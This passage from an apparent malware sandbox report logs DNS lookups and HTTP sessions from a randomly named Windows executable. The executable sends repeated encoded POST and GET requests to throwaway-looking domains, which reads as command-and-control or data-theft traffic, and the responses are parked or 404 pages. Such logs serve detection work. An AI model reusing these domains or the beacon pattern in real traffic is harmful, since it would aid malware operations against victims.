                                                          Jul 26, 2024 18:47:30.939110041 CEST1.1.1.1192.168.2.50x7075No error (0)suntextmeetings.online148.66.138.133A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:44.730062962 CEST1.1.1.1192.168.2.50xbb2dNo error (0)www.gridban.xyz162.254.38.56A (IP address)IN (0x0001)false
                                                          Jul 26, 2024 18:47:58.309937000 CEST1.1.1.1192.168.2.50xdf0aNo error (0)www.xawcfzcql9tcvj.shopxawcfzcql9tcvj.shopCNAME (Canonical name)IN (0x0001)false
                                                          Jul 26, 2024 18:47:58.309937000 CEST1.1.1.1192.168.2.50xdf0aNo error (0)xawcfzcql9tcvj.shop142.171.29.133A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.toppersbusiness.net
                                                          • www.rajveena.online
                                                          • www.pqnqxn.xyz
                                                          • www.lovezi.shop
                                                          • www.artfulfusionhub.lat
                                                          • www.9muyiutyt.online
                                                          • www.suntextmeetings.online
                                                          • www.gridban.xyz
                                                          • www.xawcfzcql9tcvj.shop

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.555138178.212.35.248807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:45:50.700043917 CEST473OUTGET /hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.toppersbusiness.net
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:45:51.754302025 CEST1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 26 Jul 2024 16:45:51 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jul 26, 2024 18:45:51.755496025 CEST253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.55513984.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:11.955506086 CEST722OUTPOST /wptv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.rajveena.online
                                                          Origin: http://www.rajveena.online
                                                          Referer: http://www.rajveena.online/wptv/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 43 66 35 61 72 69 61 39 6b 4a 6c 54 6c 4e 4d 7a 4f 45 4a 32 67 5a 6d 69 35 7a 75 50 61 78 68 38 32 59 2f 6a 6f 76 47 75 67 63 6d 54 75 41 46 5a 45 50 66 59 47 41 62 39 76 4e 66 74 33 30 7a 62 53 36 72 32 54 61 49 48 45 73 6d 49 55 72 70 2b 55 62 2b 34 56 48 6e 38 33 64 4f 6c 5a 54 32 52 72 65 41 6f 47 72 62 6a 6d 36 58 75 67 4a 59 57 51 36 31 79 52 73 69 62 4d 58 37 69 46 72 51 6a 2b 48 4d 6b 38 54 49 77 68 4e 36 45 70 41 55 4c 73 51 31 50 55 4a 51 63 30 38 34 72 62 56 68 7a 47 76 42 73 43 55 64 4b 54 63 66 74 4f 68 6f 41 51 63 74 66 72 74 4e 47 5a 4d 41 3d
                                                          Data Ascii: 1Hg=ZDyye/AZ2xXJCf5aria9kJlTlNMzOEJ2gZmi5zuPaxh82Y/jovGugcmTuAFZEPfYGAb9vNft30zbS6r2TaIHEsmIUrp+Ub+4VHn83dOlZT2RreAoGrbjm6XugJYWQ61yRsibMX7iFrQj+HMk8TIwhN6EpAULsQ1PUJQc084rbVhzGvBsCUdKTcftOhoAQctfrtNGZMA=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.55514084.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:14.524668932 CEST742OUTPOST /wptv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.rajveena.online
                                                          Origin: http://www.rajveena.online
                                                          Referer: http://www.rajveena.online/wptv/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 44 38 68 61 75 46 47 39 6d 70 6b 68 70 74 4d 7a 45 6b 4a 74 67 5a 71 69 35 33 32 66 5a 44 46 38 32 35 50 6a 35 64 75 75 6e 63 6d 54 38 67 46 63 4a 76 65 31 47 41 47 41 76 49 2f 74 33 30 58 62 53 37 37 32 54 4e 63 41 56 73 6d 57 4e 37 70 34 62 37 2b 34 56 48 6e 38 33 64 61 50 5a 54 2b 52 72 50 51 6f 48 4b 62 67 36 71 58 70 77 70 59 57 64 61 31 75 52 73 69 39 4d 57 58 49 46 6f 6f 6a 2b 48 38 6b 79 69 49 2f 32 64 36 47 6a 67 56 6a 73 52 6b 30 4d 71 34 6e 32 71 38 6a 59 57 68 31 48 5a 73 47 59 32 56 69 41 38 7a 56 65 79 67 33 42 73 4d 32 78 4f 64 32 48 62 57 6d 36 79 66 38 55 67 6b 2b 55 62 53 33 39 48 4a 78 2f 35 2f 4d
                                                          Data Ascii: 1Hg=ZDyye/AZ2xXJD8hauFG9mpkhptMzEkJtgZqi532fZDF825Pj5duuncmT8gFcJve1GAGAvI/t30XbS772TNcAVsmWN7p4b7+4VHn83daPZT+RrPQoHKbg6qXpwpYWda1uRsi9MWXIFooj+H8kyiI/2d6GjgVjsRk0Mq4n2q8jYWh1HZsGY2ViA8zVeyg3BsM2xOd2HbWm6yf8Ugk+UbS39HJx/5/M


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.55514184.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:17.093008995 CEST1759OUTPOST /wptv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.rajveena.online
                                                          Origin: http://www.rajveena.online
                                                          Referer: http://www.rajveena.online/wptv/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 5a 44 79 79 65 2f 41 5a 32 78 58 4a 44 38 68 61 75 46 47 39 6d 70 6b 68 70 74 4d 7a 45 6b 4a 74 67 5a 71 69 35 33 32 66 5a 44 4e 38 32 76 54 6a 6f 4d 75 75 6d 63 6d 54 6e 67 46 6e 4a 76 66 33 47 41 66 4c 76 49 79 57 33 32 2f 62 53 63 37 32 43 4d 63 41 63 73 6d 57 46 62 70 39 55 62 2b 68 56 47 58 6a 33 64 4b 50 5a 54 2b 52 72 4d 59 6f 4f 37 62 67 71 61 58 75 67 4a 59 61 51 36 31 53 52 73 71 44 4d 57 6a 79 46 59 49 6a 2b 6e 73 6b 77 51 51 2f 70 74 36 59 67 67 56 37 73 52 6f 72 4d 72 55 61 32 71 68 34 59 57 5a 31 4b 4f 4e 42 46 58 4a 69 53 39 2f 42 66 53 51 79 44 72 41 4a 2f 4f 56 4d 4b 59 6e 44 33 52 75 53 5a 6d 41 43 42 71 33 66 71 79 78 56 7a 39 75 32 77 71 54 55 55 4f 35 31 51 65 62 38 7a 4b 31 6a 2f 68 46 63 43 55 59 62 62 4d 4f 77 78 6b 69 70 6b 41 46 74 54 36 65 4e 6c 35 57 6e 4b 4d 2b 44 31 73 62 74 55 68 72 66 63 31 63 78 74 76 53 70 53 47 75 48 43 2f 48 68 4f 6d 75 72 63 38 4f 78 54 77 6f 46 57 34 50 73 74 35 4e 6d 59 52 4f 44 78 58 63 42 39 6b 37 42 69 4c 6f 73 55 79 49 72 42 56 [TRUNCATED]
                                                          Data Ascii: 1Hg=ZDyye/AZ2xXJD8hauFG9mpkhptMzEkJtgZqi532fZDN82vTjoMuumcmTngFnJvf3GAfLvIyW32/bSc72CMcAcsmWFbp9Ub+hVGXj3dKPZT+RrMYoO7bgqaXugJYaQ61SRsqDMWjyFYIj+nskwQQ/pt6YggV7sRorMrUa2qh4YWZ1KONBFXJiS9/BfSQyDrAJ/OVMKYnD3RuSZmACBq3fqyxVz9u2wqTUUO51Qeb8zK1j/hFcCUYbbMOwxkipkAFtT6eNl5WnKM+D1sbtUhrfc1cxtvSpSGuHC/HhOmurc8OxTwoFW4Pst5NmYRODxXcB9k7BiLosUyIrBVcSB4u7xl7Zx7ZvIZxQHdily+Oirbd515Nn0utySqm4AoBRGEDUWiRpRrnaUZ8MtC2ucDb8p5bCC/5rbpZRvJ5FNgQ4HqRtvyA8sxZsDGDpzThhtD/Smq1Go+8dpXLPvI2afDCl635aFFTVdjvWMLxfM6J3PWlEh8b1EURBoI9jr2AjAiJiLzXzPaUOHDFJA+e/H8b0qSdfdTijuhlRMkAM3gmU5knZQ3aeekGoqxg0VQ61xBTou8RhQ+ylIEeNILQ+hUS05QcTOaPvlF/fQPpzXsr90Q5E0Qny4JHKJRg73OPGYWjXZks3VMPhQeV52ePgCq6TqcTvd9NBJNuH0i6erlR//WMIds7eUxAqF4foL7P935Q+dLbxWcDKyQ79tAP0BUnYBQXOMQOOYO6e7CxWD/riFOQg3+KKHcgMafWnCSmxWVY7fp+7YecpAiY4t6l+O67wi5WLuW1+FsYSnwXzpr6F8OgQHbDLsZbo6o3+I1hwVAPfXkFPv0D/2GURzK4b6hrmZnZvyq4GMHMr64p51rGJKSnCsuuGbk5OxlyJVb+W4tAetCWqf2lM02ZP5y0OvFAYgaACOLSHB9PjLctkjyGk0VvsC/J/3koxKzlNnWNRonW+n6ijpofU5sQYIhV4GOFeuWyzdeYz8UcUuQugqrmPJXAI9EKz [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.55514284.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:19.667263985 CEST469OUTGET /wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.rajveena.online
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:46:20.132971048 CEST1236INHTTP/1.1 200 OK
                                                          Server: hcdn
                                                          Date: Fri, 26 Jul 2024 16:46:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 10072
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: 1a6f29ca88dbfcaeb39fde964a5e0465-bos-edge1
                                                          Expires: Fri, 26 Jul 2024 16:46:19 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                          Jul 26, 2024 18:46:20.133296967 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                          Jul 26, 2024 18:46:20.133308887 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                          Jul 26, 2024 18:46:20.134790897 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                          Jul 26, 2024 18:46:20.134804964 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                          Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                          Jul 26, 2024 18:46:20.137044907 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                          Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                          Jul 26, 2024 18:46:20.137059927 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                          Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                          Jul 26, 2024 18:46:20.137068033 CEST108INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                          Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g
                                                          Jul 26, 2024 18:46:20.139771938 CEST1236INData Raw: 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76
                                                          Data Ascii: <=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCode
                                                          Jul 26, 2024 18:46:20.139789104 CEST416INData Raw: 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78 6e 2d 2d 22 2b 70 75 6e
                                                          Data Ascii: ."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.dec


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.555143104.21.59.240807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:36.144392014 CEST707OUTPOST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 50 44 49 61 64 63 44 79 75 39 78 70 34 32 48 62 77 48 69 73 6d 69 63 74 2b 4f 67 2f 7a 78 30 33 44 78 43 46 6a 41 55 31 38 4e 6a 64 51 4e 78 73 37 37 44 48 33 64 56 67 2b 34 51 63 47 58 50 52 55 6c 78 6b 66 42 52 74 61 4c 6f 6b 34 38 44 63 78 2f 69 44 6d 38 43 47 53 43 63 55 44 50 63 39 57 6b 6c 55 68 6a 6b 56 37 34 71 67 42 73 71 4f 50 76 61 5a 77 32 45 62 48 73 6f 38 53 77 4d 5a 56 57 4e 69 63 33 77 79 43 79 45 34 78 39 77 48 46 55 63 35 66 6a 79 56 5a 39 69 75 54 49 46 59 42 45 4c 58 70 37 30 4c 6c 51 6b 62 34 34 4e 75 37 42 58 35 66 6c 66 47 36 73 77 3d
                                                          Data Ascii: 1Hg=x8sZizE8SZt3PDIadcDyu9xp42HbwHismict+Og/zx03DxCFjAU18NjdQNxs77DH3dVg+4QcGXPRUlxkfBRtaLok48Dcx/iDm8CGSCcUDPc9WklUhjkV74qgBsqOPvaZw2EbHso8SwMZVWNic3wyCyE4x9wHFUc5fjyVZ9iuTIFYBELXp70LlQkb44Nu7BX5flfG6sw=
                                                          Jul 26, 2024 18:46:36.946926117 CEST658INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:36 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsDhwv1f2OurgEQ9vtg7svDYI2W1TVhfwB953DZUDaMCKkfvHnnUBzaMoLqvI2hDc%2FwoS6qEaU2Y9E3%2F2ffcwuejPPZAS4z7gg5oLEu%2F%2BaOQWphwsDOSa48PQ%2Bk6T1Hbww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95dde66ebf32e4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.555144104.21.59.240807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:38.724800110 CEST727OUTPOST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
